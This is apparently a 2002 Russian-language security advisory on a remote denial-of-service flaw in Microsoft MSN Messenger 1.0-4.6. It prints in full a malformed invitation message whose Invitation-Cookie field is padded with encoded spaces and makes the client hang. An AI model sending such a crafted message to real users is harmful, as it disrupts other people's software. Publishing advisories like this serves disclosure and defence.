Security Lab

Удаленный DoS через некорректный заголовок Invitation-Cookie в MSN Messenger

Дата публикации:27.05.2002
Всего просмотров:1355
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Msn Messenger - популярный интернет пейджер от Microsoft для Windows систем.

Уродливый запрос, содержащий закодированные символы пробела (%20) в поле Invitation-Cookie, посланный удаленному пользователю, может привести к зависанию клиента Microsoft MSN Messenger.

Уязвимость обнаружена в Microsoft MSN Messenger Service 1.0-4.6

Пример:

MIME-Version: 1.0 
Content-Type: text/x-msmsgsinvite; charset=UTF-8 

Application-Name: Remote Assistance 
Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc} 
Session-Protocol: SM1 
Application-URL: http://www.microsoft.com 
Invitation-Command: INVITE 
Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20% 
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 
Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B} 
Ссылки: Misformated message header causes msn messenger to crash